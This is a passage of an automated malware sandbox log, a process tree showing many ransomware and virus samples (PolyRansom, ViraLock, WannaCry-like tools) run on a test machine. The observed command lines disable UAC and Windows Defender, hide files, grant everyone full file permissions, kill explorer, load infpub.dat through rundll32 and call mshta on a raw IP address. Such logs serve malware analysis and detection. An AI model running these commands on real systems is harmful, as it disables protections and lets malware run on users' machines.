        taskkill /FI "USERNAME eq Admin" /F /IM hSwAwgQU.exe
        5⤵
        Kills process with taskkill
        
        PID:4552
    - - C:\ProgramData\OmsIsssM\hSwAwgQU.exe
        
        "C:\ProgramData\OmsIsssM\hSwAwgQU.exe"
        5⤵
        
        PID:4880
- - C:\Users\Admin\uyAkIkYM\xyYowMgI.exe
    "C:\Users\Admin\uyAkIkYM\xyYowMgI.exe"
    3⤵
    - Executes dropped EXE
    PID:3068
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /FI "USERNAME eq Admin" /F /IM hSwAwgQU.exe
      4⤵
      Kills process with taskkill
      PID:7020
  - - C:\ProgramData\OmsIsssM\hSwAwgQU.exe
      "C:\ProgramData\OmsIsssM\hSwAwgQU.exe"
      4⤵
      PID:5136
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /FI "USERNAME eq Admin" /F /IM xyYowMgI.exe
        5⤵
        Kills process with taskkill
        
        PID:5924
    - - C:\Users\Admin\uyAkIkYM\xyYowMgI.exe
        
        "C:\Users\Admin\uyAkIkYM\xyYowMgI.exe"
        5⤵
        
        PID:6768
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:3360
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    - Modifies registry key
    PID:424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
    3⤵
    PID:4288
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom
      4⤵
      PID:772
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pcokAwYQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        5⤵
        
        PID:4380
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:5920
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        Modifies registry key
        
        PID:5492
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies registry key
        
        PID:3920
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
        5⤵
        
        PID:3776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ACkYogQA.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
    3⤵
    PID:868
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - Modifies registry key
    PID:4696
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:2860
- - C:\Users\Admin\AppData\Local\Temp\is-DP922.tmp\is-MI7RM.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-DP922.tmp\is-MI7RM.tmp" /SL4 $101FA "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808
    3⤵
    PID:4960
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:3808
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  PID:4596
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    C:\Users\Admin\AppData\Local\Temp\[email protected]
    3⤵
    PID:4568
  - - C:\Program Files (x86)\Security Central\Security Central.exe
      "C:\Program Files (x86)\Security Central\Security Central.exe"
      4⤵
      PID:5480
    - - C:\Program Files (x86)\Security Central\Security Central.exe
        
        "C:\Program Files (x86)\Security Central\Security Central.exe"
        5⤵
        
        PID:6124
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 744
        6⤵
        Program crash
        
        PID:5312
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  PID:3168
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\system32\rundll32.exe" "C:\ProgramData\ed027c81-5eef-4391-b635-929fdb166eb9_31.avi", start
    3⤵
    PID:3224
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\wrk971F.tmp", start worker
      4⤵
      PID:5208
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  PID:3964
- - C:\Users\Admin\AppData\Local\Temp\winsp2up.exe
    "C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"
    3⤵
    PID:3992
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  PID:2608
- - C:\Windows\SysWOW64\sc.exe
    sc stop WinDefend
    3⤵
    - Launches sc.exe
    PID:5340
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:5472
- - C:\Users\Admin\AppData\Roaming\gtvlgk.exe
    C:\Users\Admin\AppData\Roaming\gtvlgk.exe
    3⤵
    PID:5736
  - - C:\Windows\SysWOW64\sc.exe
      sc config WinDefend start= disabled
      4⤵
      Launches sc.exe
      PID:5592
  - - C:\Windows\SysWOW64\mshta.exe
      mshta.exe "http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=XZIOFAVD&2=i-s&3=61&4=9200&5=6&6=2&7=919041&8=1033"
      4⤵
      PID:3552
  - - C:\Windows\SysWOW64\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:5380
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EN2B55~1.EXE" >> NUL
    3⤵
    PID:2392
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  PID:4080
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 480
    3⤵
    - Program crash
    PID:4200
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  PID:2064
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:4392
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - Modifies registry key
    PID:1952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GgkYckcI.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
    3⤵
    PID:2908
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    - Modifies registry key
    PID:2268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
    3⤵
    PID:1920
- C:\Users\Admin\AppData\Local\Temp\Fantom.exe
  "C:\Users\Admin\AppData\Local\Temp\Fantom.exe"
  2⤵
  PID:5648
- - C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe
    "C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"
    3⤵
    PID:5332
- C:\Users\Admin\AppData\Local\Temp\UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe
  "C:\Users\Admin\AppData\Local\Temp\UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe"
  2⤵
  PID:5704
- - C:\Users\Admin\AppData\Local\Temp\@[email protected]
    "C:\Users\Admin\AppData\Local\Temp\@[email protected]"
    3⤵
    PID:4812
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:5332
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:4932
  - - C:\WINDOWS\302746537.exe
      "C:\WINDOWS\302746537.exe"
      4⤵
      PID:3060
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6B77.tmp\302746537.bat" "
        5⤵
        
        PID:4940
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:912
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:3924
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:5944
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
      4⤵
      PID:6900
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:3908
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:3128
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:3780
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM explorer.exe
      4⤵
      Kills process with taskkill
      PID:4612
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:3860
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:1624
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:3568
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:5356
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:3168
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:3060
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 564
      4⤵
      Program crash
      PID:5164
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:5084
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:5828
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:5128
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:4032
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:5376
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
      4⤵
      PID:5176
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\icgoIAQk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
      4⤵
      PID:6220
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:6212
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      Modifies registry key
      PID:6204
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies registry key
      PID:6196
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:4008
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 444
      4⤵
      Program crash
      PID:3492
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:5432
  - - C:\Users\Admin\AppData\Local\Temp\is-KU2SP.tmp\is-SGGPQ.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-KU2SP.tmp\is-SGGPQ.tmp" /SL4 $20450 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808
      4⤵
      PID:6348
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:6044
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      C:\Users\Admin\AppData\Local\Temp\[email protected]
      4⤵
      PID:6728
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:2412
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:6156
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6156 -s 448
      4⤵
      Program crash
      PID:6628
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:6308
  - - C:\Windows\SysWOW64\sc.exe
      sc config WinDefend start= disabled
      4⤵
      Launches sc.exe
      PID:6440
  - - C:\Windows\SysWOW64\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:6252
  - - C:\Users\Admin\AppData\Roaming\mbqbbr.exe
      C:\Users\Admin\AppData\Roaming\mbqbbr.exe
      4⤵
      PID:6320
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WinDefend
        5⤵
        Launches sc.exe
        
        PID:5340
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config WinDefend start= disabled
        5⤵
        Launches sc.exe
        
        PID:1372
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EN2B55~1.EXE" >> NUL
      4⤵
      PID:3680
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:6364
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:6408
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
      4⤵
      PID:6536
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies registry key
      PID:6604
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      Modifies registry key
      PID:6640
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:6668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aSgsAYkQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
      4⤵
      PID:7084
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:6492
  - - C:\Windows\SysWOW64\icacls.exe
      icacls . /grant Everyone:F /T /C /Q
      4⤵
      Modifies file permissions
      PID:7152
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h .
      4⤵
      Views/modifies file attributes
      PID:7104
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:6596
- - C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    3⤵
    PID:6720
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 416
      4⤵
      Program crash
      PID:6580
- - C:\Users\Admin\AppData\Local\Temp\taskdl.exe
    "C:\Users\Admin\AppData\Local\Temp\taskdl.exe"
    3⤵
    PID:4804
- - C:\Users\Admin\AppData\Local\Temp\taskse.exe
    "C:\Users\Admin\AppData\Local\Temp\taskse.exe"
    3⤵
    PID:5484
- - C:\Users\Admin\AppData\Local\Temp\winsp2up.exe
    "C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"
    3⤵
    PID:1236
- - C:\Users\Admin\AppData\Local\Temp\UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe
    "C:\Users\Admin\AppData\Local\Temp\UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe"
    3⤵
    PID:3892
  - - C:\Users\Admin\AppData\Local\Temp\240627015.exe
      "C:\Users\Admin\AppData\Local\Temp\240627015.exe"
      4⤵
      PID:6776
  - - C:\Users\Admin\AppData\Local\Temp\@[email protected]
      "C:\Users\Admin\AppData\Local\Temp\@[email protected]"
      4⤵
      PID:2932
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:5464
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:1204
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:3400
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:6284
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:4164
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:5408
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:7032
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
        5⤵
        
        PID:1952
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:6452
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:4732
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:2388
    - - C:\Users\Admin\AppData\Local\6AdwCleaner.exe
        
        "C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
        5⤵
        
        PID:6644
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:6988
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:5944
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:6108
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 556
        5⤵
        Program crash
        
        PID:1780
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:5492
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:6756
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:2520
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:1400
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YWoYsAAU.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        5⤵
        
        PID:4772
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:2352
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        Modifies registry key
        
        PID:6100
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies registry key
        
        PID:3756
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"
        5⤵
        
        PID:2488
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:4160
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:2372
    - - C:\Users\Admin\AppData\Local\Temp\is-625IT.tmp\is-O4PB8.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-625IT.tmp\is-O4PB8.tmp" /SL4 $30834 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808
        5⤵
        
        PID:6312
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:6900
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:6880
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:5348
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:6604
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:3604
    - - C:\Users\Admin\AppData\Roaming\gqflxg.exe
        
        C:\Users\Admin\AppData\Roaming\gqflxg.exe
        5⤵
        
        PID:5940
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config WinDefend start= disabled
        5⤵
        Launches sc.exe
        
        PID:5636
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WinDefend
        5⤵
        Launches sc.exe
        
        PID:5084
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EN2B55~1.EXE" >> NUL
        5⤵
        
        PID:7064
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:3148
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 448
        5⤵
        Program crash
        
        PID:1012
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:5780
    - - C:\Users\Admin\AppData\Local\Temp\[email protected]
        
        C:\Users\Admin\AppData\Local\Temp\[email protected]
        5⤵
        
        PID:5024
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:1184
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:6436
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"
        5⤵
        
        PID:7140
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies registry key
        
        PID:6816
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        Modifies registry key
        
        PID:7080
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:932
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kcgQcMEI.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        5⤵
        
        PID:872
  - - C:\Users\Admin\AppData\Local\Temp\Fantom.exe
      "C:\Users\Admin\AppData\Local\Temp\Fantom.exe"
      4⤵
      PID:6168
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:4424
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 416
        5⤵
        Program crash
        
        PID:760
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\[email protected]
      "C:\Users\Admin\AppData\Local\Temp\[email protected]"
      4⤵
      PID:5172
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls . /grant Everyone:F /T /C /Q
        5⤵
        Modifies file permissions
        
        PID:6480
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h .
        5⤵
        Views/modifies file attributes
        
        PID:3232
  - - C:\Users\Admin\AppData\Local\Temp\taskdl.exe
      "C:\Users\Admin\AppData\Local\Temp\taskdl.exe"
      4⤵
      PID:6612
  - - C:\Users\Admin\AppData\Local\Temp\UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe
      "C:\Users\Admin\AppData\Local\Temp\UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe"
      4⤵
      PID:4776
  - - C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe
      "C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"
      4⤵
      PID:5524
  - - C:\Users\Admin\AppData\Local\Temp\winsp2up.exe
      "C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"
      4⤵
      PID:3412
  - - C:\Users\Admin\AppData\Local\Temp\taskse.exe
      "C:\Users\Admin\AppData\Local\Temp\taskse.exe"
      4⤵
      PID:4592
- - C:\Users\Admin\AppData\Local\Temp\Fantom.exe
    "C:\Users\Admin\AppData\Local\Temp\Fantom.exe"
    3⤵
    PID:7044
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  PID:5580
- - C:\Windows\SysWOW64\WerFault.exe
